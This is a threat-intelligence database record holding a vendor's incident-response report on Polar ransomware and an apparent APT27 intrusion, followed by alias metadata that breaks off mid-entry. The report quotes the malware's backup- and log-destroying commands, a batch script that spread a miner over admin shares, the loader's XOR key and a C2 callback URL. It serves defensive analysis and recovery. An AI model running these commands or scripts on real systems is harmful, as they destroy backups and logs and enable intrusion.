{
	"id": "bf622ec3-63e9-4a0f-af06-a295259028f8",
	"created_at": "2026-04-06T01:31:41.118465Z",
	"updated_at": "2026-04-10T03:37:21.546416Z",
	"deleted_at": null,
	"sha1_hash": "291c9f75be5db44e71d84666512d431a4cc5013b",
	"title": "Investigation with a twist: an accidental APT attack and averted data destruction",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1518882,
	"plain_text": "Investigation with a twist: an accidental APT attack and averted\r\ndata destruction\r\nBy Positive Technologies\r\nPublished: 2024-08-19 · Archived: 2026-04-06 00:42:20 UTC\r\nIn late April 2020, a client invited the CSIRT incident response team at the Positive Technologies Expert Security\r\nCenter (PT ESC) to investigate a network compromise that resulted in encryption of files on servers and employee\r\nworkstations.\r\nWe initially assumed that this was yet another attack on corporate networks with a common variety of\r\nransomware. However, what we found was different: this intrusion was the work of a well-known Asian APT\r\ngroup implicated in cyberespionage against government targets. The initial successful compromise had taken\r\nplace two years prior.\r\nIn this article, we will share the results of our investigation of this targeted attack, which started with the\r\ncompromise of a foreign office. Ultimately, we succeeded in bringing the infrastructure back to a secure condition\r\nand reversing the damage that had been done.\r\nSequence of events\r\nMass encryption of files on the client's infrastructure and a ransom demand formed the starting point of the\r\ninvestigation. A large number of damaged files is itself a very visible attack indicator that enabled detecting the\r\nintrusion. Retrospective analysis showed that the client's infrastructure had been compromised not three or four\r\ndays before (or even a few hours before, as often happens in mass attacks), but in early 2018. What's more, the\r\ninitial infection was of a foreign office of the client, and the head office back home was breached only afterwards.\r\nhttps://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/incident-response-polar-ransomware-apt27/\r\nPage 1 of 19\n\nWe believe that the initial entry point to the foreign office's network was a vulnerable server on the network\r\nperimeter. 
Exploitation in February 2018 enabled the attackers to gain initial access and then persistence, with the\r\nhelp of the ChinaChopper and TwoFace web shells.\r\nThe attackers used NBTScan for network reconnaissance and PsExec for lateral movement. They obtained\r\ncredentials for pivoting with Mimikatz. In some cases, we were able to detect memory dumps of the lsass process\r\nthat had been archived and uploaded. Because use of Mimikatz was likely blocked by endpoint security software,\r\nthe attackers were forced to bruteforce credentials offline. Another method was to scan hosts for so-called Eternal*\r\nSMB vulnerabilities with SMBTouch and then, where possible, run the EternalBlue exploit and infect the\r\ncomputer. On the hosts of presumably greatest interest, the SysUpdate and HyperBro backdoors were installed for\r\nreliable persistence and access.\r\nOne unexpected result of the compromise was cryptocurrency mining at both the foreign office and headquarters.\r\nSuch activity remained unnoticed for one and a half years. During this time the attackers only maintained their\r\naccess by periodically obtaining new accounts or building tunnel chains. Our belief is that by early 2020,\r\nthe attackers had lost their access (for reasons unknown to us). We can see use of web shells on the foreign office's\r\nservers on February 9, 2020. Subsequent actions were very similar to what had happened two years earlier. By\r\nusing the tools already described, the attackers obtained the credentials of a domain administrator at\r\nheadquarters. This time, they deleted OS logs and stopped Shadow Copy services, complicating subsequent\r\nincident analysis.\r\nFor the finale, on April 29, 2020, the account of the compromised domain admin was used to push Polar\r\nransomware to computers and run it, encrypting user files and demanding a ransom. 
While our specialists were\r\nassisting the client in May 2020, the attackers made yet another attempt to regain control of the infrastructure with the\r\nhelp of web shells that were still in place on the networks of the headquarters and the foreign office, but this time to no\r\nsuccess.\r\nHere we have provided a timeline to better show the sequence of events.\r\nCSIRT's objectives included recovering the client's data, which included key information belonging to different\r\ndepartments. We performed analysis of the encryption malware and were able to recover the lost files.\r\nPolar ransomware\r\nThe method used to run the ransomware is classic and, indeed, characteristic of certain Asian groups. Three files\r\nare sent to the victim's computer:\r\nGDFInstall.exe (MD5: 13435101240f78367123ef01a938c560) is a legitimate computer game component\r\nsigned by Ubisoft.\r\nGameuxInstallHelper.dll (MD5: 1fd8402275d42e7389f0d28b9537db0f) is a .NET DLL library (compiled\r\non April 29, 2020) imported when GDFInstall.exe is run.\r\nThis component is not actually legitimate, however: attacker code runs inside its exported GameExplorerInstallW\r\nfunction. 
This frequently used technique of loading malicious code in the context of a legitimate\r\napplication is known as DLL hijacking.\r\nThe file c:\\programdata\\Sysurl.Hex is read (after being copied from c:\\windows\\system32\\Sysurl.Hex, if absent)\r\nand then decrypted with a simple XOR using the key ABCSCDFRWFFSDJJHGYUOIj. The result is decoded with Base64,\r\nyielding a PE file that is loaded and run in memory with .NET. The payload and intermediate library are deleted\r\nbefore completion. Deletion is done in the standard (insecure) way, which makes it possible to recover the data if disk\r\nwrites are stopped in time and the information has not been overwritten.\r\nSysurl.Hex is an encrypted copy of the Polar ransomware.\r\nThis payload call sequence (in which a legitimate application loads a malicious library, which in turn decrypts a\r\nthird component and passes control to it) is very commonly used to run the PlugX backdoor, which is widely seen\r\namong such Asian APT groups as APT10, APT41, TA459, and Bronze Union.\r\nLet's consider the decrypted and decoded version of the ransomware (MD5:\r\n841980b4ae02a4e6520ab834deee241b) in greater detail.\r\nBased on how GameuxInstallHelper.dll is launched, we can quickly guess that this file, too, is an executable file\r\ncompiled with .NET. The compilation date is April 9, 2020. 
The code entry point is the Actions method of the\r\nEncode class in the Polar namespace (which is the name we have used for the malware family).\r\nThe malware deletes system event logs and shadow copies by running the following commands:\r\ndism /online /enable-feature /featurename:NetFx3\r\nvssadmin.exe Delete Shadows /All /Quiet\r\nbcdedit /set {default} recoveryenabled no\r\nwmic shadowcopy delete\r\nwbadmin delete backup\r\nwbadmin delete systemstatebackup -keepversions:0\r\nbcdedit /set {default} bootstatuspolicy ignoreallfailures\r\nbcdedit /set {default} recoveryenabled no\r\nwevtutil.exe clear-log Application\r\nwevtutil.exe clear-log Security\r\nwevtutil.exe clear-log System\r\nwbadmin delete catalog -quiet\r\nwbadmin delete catalog -quiet\r\nwbadmin delete systemstatebackup\r\nIt then looks for and stops the following processes:\r\nagntsvc.exe\r\nagntsvc.exe\r\nagntsvc.exe\r\nagntsvc.exe\r\ndbeng50.exe\r\ndbsnmp.exe\r\nencsvc.exe\r\nexcel.exe\r\nfirefoxconfig.exe\r\ninfopath.exe\r\nisqlplussvc.exe\r\nmsaccess.exe\r\nmsftesql.exe\r\nmspub.exe\r\nmydesktopqos.exe\r\nmydesktopservice.exe\r\nmysqld-nt.exe\r\nmysqld-opt.exe\r\nmysqld.exe\r\nnotepad++.exe\r\nnotepad.exe\r\nocautoupds.exe\r\nocomm.exe\r\nocssd.exe\r\nonenote.exe\r\noracle.exe\r\noutlook.exe\r\npowerpnt.exe\r\nsqbcoreservice.exe\r\nsqlagent.exe\r\nsqlbrowser.exe\r\nsqlservr.exe\r\nsqlwriter.exe\r\nsteam.exe\r\nsynctime.exe\r\ntbirdconfig.exe\r\nthebat.exe\r\nthebat64.exe\r\nthunderbird.exe\r\nvisio.exe\r\nwinword.exe\r\nwordpad.exe\r\nxfssvccon.exe\r\nThen the malware gets a list of connected disks and starts recursive traversal of directories, skipping a few of\r\nthem:\r\nC:\\Windows\r\nC:\\Program Files\r\nC:\\Program Files 
(x86)\r\nC:\\ProgramData\r\nC:\\Python\r\n$SysReset\r\n$Recycle.Bin\r\n$RECYCLE.BIN\r\nIt cares only about files with the following extensions:\r\n.3dm\r\n.3ds\r\n.3g2\r\n.3gp\r\n.7z\r\n.accdb\r\n.ai\r\n.aif\r\n.asf\r\n.asp\r\n.aspx\r\n.avi\r\n.bak\r\n.bin\r\n.bmp\r\n.c\r\n.cbr\r\n.cer\r\n.cfm\r\n.class\r\n.cpp\r\n.crdownload\r\n.cs\r\n.csr\r\n.css\r\n.csv\r\n.cue\r\n.dat\r\n.db\r\n.dbf\r\n.dds\r\n.deb\r\n.dmg\r\n.dmp\r\n.doc\r\n.docx\r\n.dtd\r\n.dwg\r\n.dxf\r\n.eps\r\n.fla\r\n.flv\r\n.ged\r\n.gif\r\n.gz\r\n.h\r\n.html\r\n.ics\r\n.iff\r\n.indd\r\n.ini\r\n.iso\r\n.java\r\n.jpg\r\n.js\r\n.jsp\r\n.key\r\n.keychain\r\n.log\r\n.lua\r\n.m\r\n.m3u\r\n.m4a\r\n.m4v\r\n.max\r\n.mdb\r\n.mdf\r\n.mid\r\n.mov\r\n.mp3\r\n.mp4\r\n.mpa\r\n.mpg\r\n.msg\r\n.msi\r\n.obj\r\n.odt\r\n.pages\r\n.part\r\n.pct\r\n.pdb\r\n.pdf\r\n.php\r\n.pkg\r\n.pl\r\n.png\r\n.pps\r\n.ppt\r\n.pptx\r\n.ps\r\n.psd\r\n.py\r\n.rar\r\n.rm\r\n.rpm\r\n.rss\r\n.rtf\r\n.sdf\r\n.sh\r\n.sitx\r\n.sln\r\n.sql\r\n.srt\r\n.svg\r\n.swf\r\n.swift\r\n.tar\r\n.tar.gz\r\n.tax2014\r\n.tax2015\r\n.tex\r\n.tga\r\n.thm\r\n.tif\r\n.tiff\r\n.tmp\r\n.toast\r\n.torrent\r\n.txt\r\n.vb\r\n.vcd\r\n.vcf\r\n.vcxproj\r\n.vob\r\n.wav\r\n.wma\r\n.wmv\r\n.wpd\r\n.wps\r\n.xcodeproj\r\n.xhtml\r\n.xlr\r\n.xls\r\n.xlsx\r\n.xml\r\n.yuv\r\n.zip\r\n.zipx\r\nBefore starting encryption, the malware creates what we will call a base encryption key consisting of eight\r\nrandomly chosen characters from the following alphabet:\r\nabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890*!=\u0026?\u0026/\r\nTwo approaches to encryption are used, depending on the file size. Each approach involves a different encryption\r\nkey. The base encryption key is used in both approaches, however.\r\nFirst we will look at the approach for encryption of files with size less than 64,052,000 bytes (approximately 61\r\nMB). 
The intermediate password is the SHA-256 hash sum of the base encryption key. It is identical for all files\r\nand is used with a hard-coded salt and 1,000 iterations to generate the encryption key and initialization vector.\r\nEach file is encrypted with AES-CBC. The .locked extension is added to encrypted files.\r\nLarger files are encrypted in a different way. In this case, the 16-byte encryption key is formed by taking the first 8\r\nbytes from the base encryption key and the remaining 8 bytes from an additional hard-coded array. This is\r\nfollowed by a custom implementation of AES-ECB. Blocks of 16 bytes are encrypted, with the next 12,800 bytes\r\nskipped. The result is that only small parts of the file—not the entire file—are encrypted. This method was likely\r\nchosen to speed up the encryption process. Encrypted files have the .cryptd extension.\r\nNote that encryption produces a new file (to which the encrypted stream is written). The original file is insecurely\r\ndeleted. 
Therefore, the original files can also be recovered from unallocated disk space if they have not yet been\r\noverwritten with fresh information.\r\nIn each directory containing encrypted files, a file named readme_contact_alex.dali@iran.ir.htm is created with\r\nthe following contents:\r\nYour companies cyber defense systems have been weighed, measured and have been found wanting!!!\r\nThe breach is a result of grave neglect of security protocols\r\nAll of your computers have been corrupted with Polar malware that has encrypted your files.\r\nWe ensure that the only way to retrieve your data swiftly and securely is with our software.\r\nRestoration of your data requires a private key which only we possess\r\nDon't waste your time and money purchasing third party software, without the private key they are use\r\nIt is critical that you don't restart or shutdown your computer.\r\nThis may lead to irreversible damage to your data and you may not be able to turn your computer back\r\nTo confirm that our software works email to us 2 files from random computers you will get them decryp\r\nreadme_contact_alex.dali@iran.ir.htm contain encrypted session keys we need in order to be able to de\r\nThe softwares price will include a guarantee that your company will never be inconvenienced by us.\r\nYou will also receive a consultation on how to improve your companies cyber security\r\nIf you want to purchase our software to restore your data contact us at:\r\nPt34Jarmys@protonmail.com\r\nalex.dali@iran.ir\r\nWe can only show you the door. You're the one who has to walk through it.\r\nYour personal installation key:*REDACTED*\r\nThe text of the ransom demand resembles that used by MegaCortex ransomware.\r\nThe ransom demand contains a modified version of the base encryption key. 
This version is derived by encrypting\r\nthe base encryption key with RSA (with a hard-coded 1024-byte public key) and encoding it in Base64.\r\nAfter file encryption is completed, the malware writes an image (contained in executable file resources) to disk at\r\nthe path c:\\programdata\\Rs.bmp and sets it as the desktop background.\r\nThe malware subsequently repeats the same procedure for deleting system event logs and shadow copies that it\r\nperformed at the start. Then it sends an HTTP POST request with the name of the victim's computer to a server at\r\nhxxp://www.therockbrazil.com.br/assinaturas/logs.php.\r\nHow we decrypted the files\r\nReaders following the chain of encryption steps have likely noticed that the security of this whole encryption\r\nsystem depends on what we have called the base encryption key. Its value is encrypted with RSA-1024 and placed\r\nin the ransom demand. Currently, there are no methods that are both cheap and fast for factoring a key of such\r\nsize. So we tried another tactic.\r\nRemember that the base key is generated by taking eight random characters from the alphabet quoted earlier. Here\r\nis how the implementation works:\r\nThe Random class is instantiated once, without any arguments, so the seed of the pseudorandom generator is\r\ntaken from the value of the Environment.TickCount variable. This variable\r\nis 4 bytes and stores the number of milliseconds since the operating system started.\r\nSo to decrypt the files, all we need to know is the uptime (how long the computer has been turned on) as of when\r\nthe ransomware ran. 
But how simple is it to calculate?\r\nMost of the affected computers had not only been disconnected from the corporate network, but turned off for\r\nanalysis of the hard drive contents. As a result, the uptime of the computers was no longer available. The operating\r\nsystem logs contain timestamps for shutdown and power on. But in this case, the ransomware destroys these logs\r\ntwice. So we were unable to find any clues pointing at possible values of uptime on the affected computers\r\nthemselves.\r\nFortunately, however, SCCM was used on the client infrastructure, with client-side agents running on all the\r\nencrypted computers. The information we needed was stored centrally and had not been tampered with: all we\r\nneeded was some trial-and-error to choose the right values.\r\nNow that we had relatively precise uptime values, we needed to determine when the ransomware had run.\r\nRemember that at the end, the malware deletes the intermediate DLL library and encrypted ransomware, but not\r\nthe legitimate executable file whose process is used for performing the malicious actions. In other words, the time\r\nat which this file appeared on the system should be the approximate time when the ransomware ran, to within\r\nseveral seconds. We succeeded in bruteforcing the exact value of the base encryption key in about a minute on an\r\nordinary workstation (on the order of a few tens of thousands of iterations). We could then decrypt the remaining\r\nfiles. In a few cases, we had a tougher time bruteforcing the key at first. The reason was that the timezones had\r\nbeen set incorrectly. With this realization, we were able to resolve this issue as well.\r\nAttribution\r\nWe mentioned the SysUpdate and HyperBro backdoors from the attackers' toolkit. 
These are somewhat esoteric\r\nRemote Access Trojans used by the APT27 group (also known as Bronze Union, LuckyMouse, Emissary Panda,\r\nor Iron Tiger). The group likely has Asian roots, with activity since at least 2010. The group focuses its attention\r\non government targets in the defense and energy industries, as well as aerospace and manufacturing. Most\r\ncommonly, the original attack vector is a compromise of the victim's web servers by exploiting vulnerabilities,\r\nbruteforcing credentials, or taking advantage of web server misconfigurations. Despite the similarities in tactics,\r\ntechniques, and procedures (TTPs) and use of a telltale toolkit, some of the team's researchers are skeptical about\r\nattribution of the attacks to APT27.\r\n1. Choice of target\r\nMedia companies had never been of interest for APT27. This is consistent with the findings of our incident\r\ninvestigation: the attackers did not try to access private information on the target infrastructure, instead only\r\nrunning software for direct financial gain.\r\n2. Cryptocurrency mining and ransomware\r\nThis is atypical and, moreover, ill-suited software that can quickly attract attention and wreck any plans for long-term cyberspying. The URL address to which the ransomware \"phones home\" upon completing its work does not\r\nhave anything in common with APT27 network infrastructure. Of course, some groups (such as Lazarus and\r\nWinnti) combine cyberspying with direct financial motivations, so perhaps APT27 is broadening its previously\r\nlimited range of interests. Or, as an alternative, the group has reached an agreement with other attackers for use of\r\ntheir software in return for a part of the proceeds. In favor of attribution of Polar to APT27, we can note the\r\nsequence of payload, execution, and naming: the encrypted SysUpdate backdoor is often named sys.bin.url and\r\nthe Polar ransomware was named Sysurl.Hex, in a rather similar way. 
However, this could also be a false flag.\r\n3. Automation in 2018 and 2020\r\nHere is the script used to automatically install a cryptocurrency miner on a list of computers in 2018:\r\n@echo off\r\nfor /f %%i in (c:\\programdata\\list.txt) do (\r\nnet use \\\\%%i\\c$ \"*\" /u:*\\administrator\r\ncopy c:\\programdata\\vmnat.exe \\\\%%i\\c$\\windows\\system32\\vmnat.exe\r\nSCHTASKS /Create /S %%i /u *\\administrator /p \"*\" /tn * /tr \"cmd.exe /c start c:\\windows\\system32\\vmn\r\nschtasks /run /S %%i /u *\\administrator /p \"*\" /tn *\r\nnet use \\\\%%i\\c$ /del\r\nnet use * /del /Y\r\n)\r\ndel vmnat.exe\r\ndel list.txt\r\ndel work.bat\r\nAnd this is the script used to automatically delete the ransomware from a list of computers in 2020:\r\n@echo off\r\nfor /f %%i in (c:\\programdata\\list.txt) do (\r\n net use \\\\%%i\\c$ \"*\" /u:*\\*\r\n if not errorlevel 1 (\r\n del \\\\%%i\\c$\\programdata\\GameuxInstallHelper.dll\r\n del \\\\%%i\\c$\\programdata\\GDFInstall.exe\r\n del \\\\%%i\\c$\\programdata\\Sysurl.Hex\r\n net use \\\\%%i\\c$ /del\r\n )ELSE (\r\n echo not access %%i \u003e\u003e c:\\programdata\\no_access.txt\r\n )\r\n)\r\n(We replaced sensitive information with '*')\r\nThe scripts show certain similarities in structure: both loop over the lines of a list file at the same path. On the other\r\nhand, the indentation, script tasks, and file naming are different. Some of the commands are too general to tell,\r\nsince they could have been found in online search results and reused.\r\n4. Bodies of the SysUpdate and HyperBro backdoors\r\nWe were not able in some cases to confirm the presence of a given backdoor based on the body of the Trojan\r\nitself. We identified the HyperBro backdoor, which had been used in 2018, based on the distinctive file name\r\ncombined with other confirmed tools. 
We confirmed the SysUpdate backdoor, used in 2020, by looking at the C2\r\naddress and backdoor body in a process memory dump that had been uploaded to VirusTotal during the\r\ninvestigation by an organization not linked to our client.\r\nTaken together, these similarities certainly point to APT27 as a culprit, but are not entirely conclusive. Therefore\r\nwe leave it to the reader to choose whether to concur regarding involvement by APT27.\r\nConclusion\r\nIn this article, we have described an APT27 attack on a media company. The cybercriminals obtained access to the\r\ncompany's headquarters by compromising an office in a foreign country. They maintained control of the\r\ninfrastructure for two years. They used both publicly available and custom-developed tools that had been seen\r\npreviously. The hackers, while not changing their TTPs, chose rather unusual software to monetize their attacks.\r\nPerhaps the compromise of this client was an accident and this was merely an attempt to obtain at least some\r\nbenefit. User data was encrypted, after which a ransom demand was made. A mistake in the ransomware's\r\ncryptographic algorithms enabled us to recover the encrypted files. 
To our knowledge, the attackers did not obtain\r\naccess to information of any value whatsoever, ultimately leaving them with nothing to show for their efforts.\r\nAuthors: Denis Goydenko and Alexey Vishnyakov, Positive Technologies\r\nMITRE TTPs\r\nTactic | ID | Name\r\nInitial Access | T1190 | Exploit Public-Facing Application\r\nInitial Access | T1199 | Trusted Relationship\r\nExecution | T1059 | Command and Scripting Interpreter: Windows Command Shell\r\nExecution | T1053 | Scheduled Task/Job: Scheduled Task\r\nExecution | T1047 | Windows Management Instrumentation\r\nPersistence | T1547 | Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder\r\nPersistence | T1574 | Hijack Execution Flow: DLL Search Order Hijacking\r\nPersistence | T1053 | Scheduled Task/Job: Scheduled Task\r\nPersistence | T1078 | Valid Accounts: Domain Accounts\r\nPersistence | T1078 | Valid Accounts: Default Accounts\r\nPrivilege Escalation | T1068 | Exploitation for Privilege Escalation\r\nDefense Evasion | T1140 | Deobfuscate/Decode Files or Information\r\nDefense Evasion | T1070 | Indicator Removal on Host: Clear Windows Event Logs\r\nDefense Evasion | T1070 | Indicator Removal on Host: File Deletion\r\nDefense Evasion | T1070 | Indicator Removal on Host: Timestomp\r\nCredential Access | T1003 | OS Credential Dumping: LSASS Memory\r\nDiscovery | T1087 | Account Discovery: Domain Account\r\nDiscovery | T1082 | System Information Discovery\r\nDiscovery | T1049 | System Network Connections Discovery\r\nLateral Movement | T1210 | Exploitation of Remote Services\r\nLateral Movement | T1570 | Lateral Tool Transfer\r\nLateral Movement | T1021 | Remote Services: SMB/Windows Admin Shares\r\nCollection | T1560 | Archive Collected Data: Archive via Utility\r\nCollection | T1005 | Data from Local System\r\nCollection | T1119 | Automated Collection\r\nCollection | T1039 | Data from Network Shared Drive\r\nCommand and Control | T1071 | Application Layer Protocol: Web Protocols\r\nCommand and Control | T1132 | Data Encoding: Standard Encoding\r\nCommand and Control | T1573 | Encrypted Channel: Symmetric Cryptography\r\nExfiltration | T1020 | Automated Exfiltration\r\nExfiltration | T1041 | Exfiltration Over C2 Channel\r\nImpact | T1486 | Data Encrypted for Impact\r\nSource: https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/incident-response-polar-ransomware-apt27/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"Malpedia"
	],
	"references": [
		"https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/incident-response-polar-ransomware-apt27/"
	],
	"report_names": [
		"incident-response-polar-ransomware-apt27"
	],
	"threat_actors": [
		{
			"id": "ec14074c-8517-40e1-b4d7-3897f1254487",
			"created_at": "2023-01-06T13:46:38.300905Z",
			"updated_at": "2026-04-10T02:00:02.918468Z",
			"deleted_at": null,
			"main_name": "APT10",
			"aliases": [
				"Red Apollo",
				"HOGFISH",
				"BRONZE RIVERSIDE",
				"G0045",
				"TA429",
				"Purple Typhoon",
				"STONE PANDA",
				"Menupass Team",
				"happyyongzi",
				"CVNX",
				"Cloud Hopper",
				"ATK41",
				"Granite Taurus",
				"POTASSIUM"
			],
			"source_name": "MISPGALAXY:APT10",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "7041fcf5-b34d-47c3-be4c-3c40f243af89",
			"created_at": "2023-01-06T13:46:38.611261Z",
			"updated_at": "2026-04-10T02:00:03.038745Z",
			"deleted_at": null,
			"main_name": "TA459",
			"aliases": [
				"G0062"
			],
			"source_name": "MISPGALAXY:TA459",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "0bf35542-9ebc-44a9-b319-b6df0bee4bac",
			"created_at": "2022-10-25T15:50:23.437853Z",
			"updated_at": "2026-04-10T02:00:05.36762Z",
			"deleted_at": null,
			"main_name": "TA459",
			"aliases": [
				"TA459"
			],
			"source_name": "MITRE:TA459",
			"tools": [
				"gh0st RAT",
				"NetTraveler",
				"PlugX",
				"ZeroT"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "802552ac-1f16-4b85-8d78-76d683684124",
			"created_at": "2022-10-25T16:07:24.28032Z",
			"updated_at": "2026-04-10T02:00:04.920517Z",
			"deleted_at": null,
			"main_name": "TA459",
			"aliases": [
				"G0062"
			],
			"source_name": "ETDA:TA459",
			"tools": [
				"Agent.dhwf",
				"AngryRebel",
				"Destroy RAT",
				"DestroyRAT",
				"Farfli",
				"Gh0st RAT",
				"Ghost RAT",
				"Kaba",
				"Korplug",
				"Moudour",
				"Mydoor",
				"NetTraveler",
				"Netfile",
				"PCRat",
				"PlugX",
				"RedDelta",
				"Sogu",
				"TIGERPLUG",
				"TVT",
				"Thoper",
				"TravNet",
				"Xamtrav",
				"ZeroT"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "e3492534-85a6-4c87-a754-5ae4a56d7c8c",
			"created_at": "2022-10-25T15:50:23.819113Z",
			"updated_at": "2026-04-10T02:00:05.354598Z",
			"deleted_at": null,
			"main_name": "Threat Group-3390",
			"aliases": [
				"Threat Group-3390",
				"Earth Smilodon",
				"TG-3390",
				"Emissary Panda",
				"BRONZE UNION",
				"APT27",
				"Iron Tiger",
				"LuckyMouse",
				"Linen Typhoon"
			],
			"source_name": "MITRE:Threat Group-3390",
			"tools": [
				"Systeminfo",
				"gsecdump",
				"PlugX",
				"ASPXSpy",
				"Cobalt Strike",
				"Mimikatz",
				"Impacket",
				"gh0st RAT",
				"certutil",
				"China Chopper",
				"HTTPBrowser",
				"Tasklist",
				"netstat",
				"SysUpdate",
				"HyperBro",
				"ZxShell",
				"RCSession",
				"ipconfig",
				"Clambling",
				"pwdump",
				"NBTscan",
				"Pandora",
				"Windows Credential Editor"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "ba9fa308-a29a-4928-9c06-73aafec7624c",
			"created_at": "2024-05-01T02:03:07.981061Z",
			"updated_at": "2026-04-10T02:00:03.750803Z",
			"deleted_at": null,
			"main_name": "BRONZE RIVERSIDE",
			"aliases": [
				"APT10 ",
				"CTG-5938 ",
				"CVNX ",
				"Hogfish ",
				"MenuPass ",
				"MirrorFace ",
				"POTASSIUM ",
				"Purple Typhoon ",
				"Red Apollo ",
				"Stone Panda "
			],
			"source_name": "Secureworks:BRONZE RIVERSIDE",
			"tools": [
				"ANEL",
				"AsyncRAT",
				"ChChes",
				"Cobalt Strike",
				"HiddenFace",
				"LODEINFO",
				"PlugX",
				"PoisonIvy",
				"QuasarRAT",
				"QuasarRAT Loader",
				"RedLeaves"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "4d5f939b-aea9-4a0e-8bff-003079a261ea",
			"created_at": "2023-01-06T13:46:39.04841Z",
			"updated_at": "2026-04-10T02:00:03.196806Z",
			"deleted_at": null,
			"main_name": "APT41",
			"aliases": [
				"WICKED PANDA",
				"BRONZE EXPORT",
				"Brass Typhoon",
				"TG-2633",
				"Leopard Typhoon",
				"G0096",
				"Grayfly",
				"BARIUM",
				"BRONZE ATLAS",
				"Red Kelpie",
				"G0044",
				"Earth Baku",
				"TA415",
				"WICKED SPIDER",
				"HOODOO",
				"Winnti",
				"Double Dragon"
			],
			"source_name": "MISPGALAXY:APT41",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "e698860d-57e8-4780-b7c3-41e5a8314ec0",
			"created_at": "2022-10-25T15:50:23.287929Z",
			"updated_at": "2026-04-10T02:00:05.329769Z",
			"deleted_at": null,
			"main_name": "APT41",
			"aliases": [
				"APT41",
				"Wicked Panda",
				"Brass Typhoon",
				"BARIUM"
			],
			"source_name": "MITRE:APT41",
			"tools": [
				"ASPXSpy",
				"BITSAdmin",
				"PlugX",
				"Impacket",
				"gh0st RAT",
				"netstat",
				"PowerSploit",
				"ZxShell",
				"KEYPLUG",
				"LightSpy",
				"ipconfig",
				"sqlmap",
				"China Chopper",
				"ShadowPad",
				"MESSAGETAP",
				"Mimikatz",
				"certutil",
				"njRAT",
				"Cobalt Strike",
				"pwdump",
				"BLACKCOFFEE",
				"MOPSLED",
				"ROCKBOOT",
				"dsquery",
				"Winnti for Linux",
				"DUSTTRAP",
				"Derusbi",
				"ftp"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "2a24d664-6a72-4b4c-9f54-1553b64c453c",
			"created_at": "2025-08-07T02:03:24.553048Z",
			"updated_at": "2026-04-10T02:00:03.787296Z",
			"deleted_at": null,
			"main_name": "BRONZE ATLAS",
			"aliases": [
				"APT41 ",
				"BARIUM ",
				"Blackfly ",
				"Brass Typhoon",
				"CTG-2633",
				"Earth Baku ",
				"GREF",
				"Group 72 ",
				"Red Kelpie ",
				"TA415 ",
				"TG-2633 ",
				"Wicked Panda ",
				"Winnti"
			],
			"source_name": "Secureworks:BRONZE ATLAS",
			"tools": [
				"Acehash",
				"CCleaner v5.33 backdoor",
				"ChinaChopper",
				"Cobalt Strike",
				"DUSTPAN",
				"Dicey MSDN",
				"Dodgebox",
				"ForkPlayground",
				"HUC Proxy Malware (Htran)"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "c63ab035-f9f2-4723-959b-97a7b98b5942",
			"created_at": "2023-01-06T13:46:38.298354Z",
			"updated_at": "2026-04-10T02:00:02.917311Z",
			"deleted_at": null,
			"main_name": "APT27",
			"aliases": [
				"BRONZE UNION",
				"Circle Typhoon",
				"Linen Typhoon",
				"TEMP.Hippo",
				"Budworm",
				"Lucky Mouse",
				"G0027",
				"GreedyTaotie",
				"Red Phoenix",
				"Iron Tiger",
				"Iron Taurus",
				"Earth Smilodon",
				"TG-3390",
				"EMISSARY PANDA",
				"Group 35",
				"ZipToken"
			],
			"source_name": "MISPGALAXY:APT27",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "ba3fff0c-3ba0-4855-9eeb-1af9ee18136a",
			"created_at": "2022-10-25T15:50:23.298889Z",
			"updated_at": "2026-04-10T02:00:05.316886Z",
			"deleted_at": null,
			"main_name": "menuPass",
			"aliases": [
				"menuPass",
				"POTASSIUM",
				"Stone Panda",
				"APT10",
				"Red Apollo",
				"CVNX",
				"HOGFISH",
				"BRONZE RIVERSIDE"
			],
			"source_name": "MITRE:menuPass",
			"tools": [
				"certutil",
				"FYAnti",
				"UPPERCUT",
				"SNUGRIDE",
				"P8RAT",
				"RedLeaves",
				"SodaMaster",
				"pwdump",
				"Mimikatz",
				"PlugX",
				"PowerSploit",
				"ChChes",
				"cmd",
				"QuasarRAT",
				"AdFind",
				"Cobalt Strike",
				"PoisonIvy",
				"EvilGrab",
				"esentutl",
				"Impacket",
				"Ecipekac",
				"PsExec",
				"HUI Loader"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "b399b5f1-42d3-4b53-8c73-d448fce6ab43",
			"created_at": "2025-08-07T02:03:24.68371Z",
			"updated_at": "2026-04-10T02:00:03.64323Z",
			"deleted_at": null,
			"main_name": "BRONZE UNION",
			"aliases": [
				"APT27 ",
				"Bowser",
				"Budworm ",
				"Circle Typhoon ",
				"Emissary Panda ",
				"Group35",
				"Iron Tiger ",
				"Linen Typhoon ",
				"Lucky Mouse ",
				"TG-3390 ",
				"Temp.Hippo "
			],
			"source_name": "Secureworks:BRONZE UNION",
			"tools": [
				"AbcShell",
				"China Chopper",
				"EAGERBEE",
				"Gh0st RAT",
				"OwaAuth",
				"PhantomNet",
				"PoisonIvy",
				"Sysupdate",
				"Wonknu",
				"Wrapikatz",
				"ZxShell",
				"reGeorg"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "5c13338b-eaed-429a-9437-f5015aa98276",
			"created_at": "2022-10-25T16:07:23.582715Z",
			"updated_at": "2026-04-10T02:00:04.675765Z",
			"deleted_at": null,
			"main_name": "Emissary Panda",
			"aliases": [
				"APT 27",
				"ATK 15",
				"Bronze Union",
				"Budworm",
				"Circle Typhoon",
				"Earth Smilodon",
				"Emissary Panda",
				"G0027",
